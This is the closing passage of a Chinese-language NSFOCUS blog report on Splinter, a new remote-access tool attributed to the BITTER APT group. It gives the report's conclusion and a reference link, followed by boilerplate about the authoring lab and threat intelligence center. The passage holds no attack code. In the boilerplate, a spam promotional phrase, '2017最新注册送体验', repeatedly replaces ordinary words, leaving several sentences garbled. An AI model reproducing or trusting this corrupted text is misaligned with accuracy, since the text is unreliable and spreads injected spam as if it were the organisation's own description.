在我们捕获该组恶意文件时,所有涉及到的基础设施目前均未被标记为BITTER,我们认为这些设施仍处于未被发现的状态。

四、总结

       尽管众多的安全厂商持续不断的披露APT组织,对APT组织进行深度的挖掘和分析,但仍然无法阻止这些APT组织开发新的攻击模块以及建设新的恶意基础设施。此次捕获到的恶意样本与2019年5月2日上传的恶意样本对比可以看出,至少在这3个月期间内,该团伙一直在集中精力开发新的RAT工具。可以预见的是,Splinter会在不久的将来替换原有的RAT工具,且其采用的加密方法将对检测带来相当大的困扰。

五、参考链接

https://s.tencent.com/research/report/615.html

关于伏影实验室

伏影实验室专注于安全威胁2017最新注册送体验与监测技术,包括但不限于威胁识别技术,威胁跟踪技术,威胁捕获技术,威胁主体识别技术。2017最新注册送体验目标包括:僵尸网络威胁,DDOS对抗,WEB对抗,流行服务系统脆弱利用威胁、身份认证威胁,数字资产威胁,黑色产业威胁 及 新兴威胁。通过掌控现网威胁来识别风险,缓解威胁伤害,为威胁对抗提供决策支撑。

关于绿盟威胁情报中心

绿盟威胁情报中心(NSFOCUS Threat Intelligence center, NTI)是绿盟科技为落实智慧安全2.0战略,促进网络空间安全生态建设和威胁情报应用,增强客户攻防对抗能力而组建的专业性安全2017最新注册送体验组织。其依托公司专业的安全团队和强大的安全2017最新注册送体验能力,对全球网络安全威胁和态势进行持续观察和分析,以威胁情报的生产、运营、应用等能力及关键技术作为核心2017最新注册送体验内容,推出了绿盟威胁情报平台以及一系列集成威胁情报的新一代安全产品,为用户提供可操作的情报数据、专业的情报服务和高效的威胁防护能力,帮助用户更好地了解和应对各类网络威胁。

文章来源:绿盟科技博客
]]>
http://blog.nsfocus.net/splinters-new-apt-attack-tool-dialysis/feed/ 0